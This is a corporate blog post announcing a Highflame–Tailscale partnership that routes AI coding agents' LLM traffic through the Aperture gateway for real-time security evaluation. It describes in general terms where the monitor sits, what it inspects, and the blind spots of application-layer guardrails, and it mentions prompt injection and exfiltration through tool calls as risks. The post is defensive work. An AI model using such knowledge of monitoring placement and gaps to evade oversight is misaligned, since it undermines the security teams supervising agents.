Highflame Technology Series

Highflame Partners with Tailscale to Help Secure AI Agents at the Network Layer

Sharath Rajasekar
AI Engineering
April 2, 2026

Securing AI Agents at the Network Layer

AI agents now generate thousands of LLM requests across developer machines, CI pipelines, and internal tooling. Each request can carry prompts, tool calls, secrets, or sensitive data. Yet in most organizations, there is little visibility into what those agents are actually doing. Today, we’re announcing a partnership between Highflame and Tailscale to change that. Together, we bring real-time AI security evaluation to the network layer. By integrating Aperture by Tailscale’s LLM traffic proxy with Highflame’s security pipeline, organizations can monitor and evaluate LLM interactions across prompts, tool calls, and model responses flowing through their tailnet, without modifying agents.

The Story of an AI Request

To understand why this partnership matters, consider what happens when a developer opens a coding agent and starts working. The developer asks OpenAI Codex to investigate a failing test. The agent reads the test file, inspects the error log, and decides it needs more context. It calls an MCP tool to search GitHub issues, finds a related issue, reads the linked pull request, and formulates a fix. It writes the patch, runs the test suite, and reports back.

Thirty seconds of developer time. Twelve LLM requests are behind the scenes.

Inside those requests are prompts that may contain database credentials copied from a config file, tool calls that pass secrets as arguments, shell commands composed autonomously by the model, and file reads that pull proprietary source code into external APIs. Each of these actions is a security-relevant event. And in most organizations today, none of them are visible to the security team.

The developer is not doing anything wrong. The agent is doing exactly what it was asked to do. But between the developer’s intent and the model’s execution, there is a gap, where sensitive data leaks, prompt injections land, and policy violations go undetected, simply because nobody is watching.

Aperture by Tailscale: The Observation Point

Aperture (currently in alpha) is a centralized AI gateway that runs inside a Tailscale network. Instead of each developer managing their own API keys and connecting directly to LLM providers, AI traffic flows through Aperture. It’s designed to transparently handle credential injection, request routing, session tracking, and telemetry capture. What makes Aperture significant is its position. It sits on the network path between AI tools in the organization and model providers. Codex, Claude Code, Cline, Gemini CLI, custom agents, if they talk to an LLM, the traffic passes through Aperture. There is no opt-out, no SDK to install, and no agent to instrument. The observation point is the network itself. Aperture gives organizations visibility into who is using AI, which models they are using, how often, and at what cost. But visibility answers the question of what is happening.

Closing the Security loop

Is any of this activity dangerous?

A prompt that contains an AWS secret key appears identical to any other prompt at the network level. A tool call that exfiltrates a customer database is structurally indistinguishable from one that queries a public API. A model response carrying an injected instruction blends in with every other response. Telemetry alone cannot distinguish between safe and unsafe AI interactions. Dashboards can show volume, latency, and cost. They cannot show that the third request in a Codex session leaked production credentials, or that a tool call was manipulated by a prompt injection embedded in a document.

This is the gap between observation and evaluation - between knowing that AI activity is happening and knowing whether that activity is safe. Application-layer solutions attempt to solve this. Guardrails can be embedded in agent frameworks. Policies can be enforced in the IDE or at a centralized MCP Gateway. Filters can run alongside model APIs. But they all share a fundamental limitation: they only protect agents that opt in. A new tool, an unmanaged device, or a custom script calling a model directly all remain invisible.

The network layer does not have this blind spot. If traffic flows through Aperture, it can be evaluated across agents, tools, and devices.

This is the gap Highflame and Tailscale set out to solve together. Tailscale built the network telemetry layer. Highflame built the security evaluation layer. On their own, each solves part of the problem. Together, they help teams better understand and evaluate AI activity at the network layer. When Aperture observes an LLM interaction, it captures the relevant context—the user’s identity, the prompt, the model response, and any tool calls with their arguments—and forwards it to Highflame in real time for analysis.

Highflame is designed to decompose the event and evaluate each component independently. Prompts are analyzed for injection and secret leakage. Tool calls are inspected for unsafe arguments and execution patterns. Responses are checked for signs of manipulation or policy violations. This can be evaluated against the organization’s security policies. What appears as a single agent interaction becomes multiple security decisions automatically, without requiring changes to developer workflows.

“AI agents are already operating across every layer of the enterprise, but security hasn’t caught up to where the activity actually happens. At Highflame, we focus on securing both the agent itself and the network it operates on. Partnering with Tailscale allows us to extend that protection to every AI interaction, without requiring developers to change how they work.”

Sharath Rajasekar, CEO, Highflame

“Aperture gives organizations a single, reliable control point for AI traffic. With Highflame, customers can take that further by understanding the security implications across prompts, tool calls, and model responses, turning visibility into something they can actually use.”

Avery Pennarun, CEO, Tailscale

Highflame Agent Control Platform: Securing the Agent and the Network

Many of the highest-risk AI interactions originate inside the agent itself, before a request ever reaches the model. MCP tools execute commands, access internal systems, and move data across boundaries. Code agents read files, construct prompts, and decide which tools to call. This is where intent is formed—and where risk begins.

Highflame was built to secure these agent-level interactions directly. At the agent layer, Highflame is designed to continuously assess an agent’s intent trajectory to determine whether it is moving toward a safe outcome or drifting into risky behavior such as data exfiltration, prompt injection, or unsafe command execution.

Rather than analyzing events in isolation, Highflame evaluates how prompts are constructed and whether they include sensitive data, which MCP tools are invoked and with what arguments, and how model outputs influence downstream actions like file writes or shell execution. This provides control over the agent's decision-making surface, not just the traffic it generates.

The integration with Tailscale extends that same security model to the network layer. Together, this creates a unified control plane that operates both within the agent—where actions are decided, and on the network, where those actions are executed.

Security is no longer limited to a single enforcement point. It can follow the entire lifecycle of an AI interaction, from prompt construction to tool execution to model response across multi-step workflows.

What This Means for Organizations

For security teams, this partnership closes a critical gap. Instead of relying on developers to self-report or hoping that every agent is instrumented, they gain a centralized, continuously evaluated view of AI activity.

For platform teams, it extends beyond visibility into stronger security governance, using the same infrastructure that already tracks usage and cost.

For developers, nothing changes. They continue using the tools they prefer. The security layer operates transparently in the background.

For compliance teams, interactions are logged with identity, context, and policy outcomes, creating the audit trail that modern AI systems increasingly require.

Getting Started

Organizations already running Tailscale Aperture can enable the Highflame integration by adding a few lines to their Aperture configuration. Detailed setup instructions are available in the Highflame + Aperture integration guide. For organizations using Highflame for MCP and Code Agent security, the Aperture integration extends the same control & decision engine to the network layer. This creates defense-in-depth, covering both the AI agent’s decision-making layer and the network path to models and tools.

Tailscale Aperture is currently in alpha and is intended for evaluation and testing. Features and integrations may change as the product evolves.

Learn more about Highflame for Code Agents here: https://highflame.com/code-agent-control-plane

Learn more about Aperture by Tailscale here:
https://tailscale.com/use-cases/securing-ai

Want to try it out or sign up for a free trial?

Book A Demo

This is some text inside of a div block.
This is some text inside of a div block.
This is some text inside of a div block.
HighFlame Technology Series

Continue Reading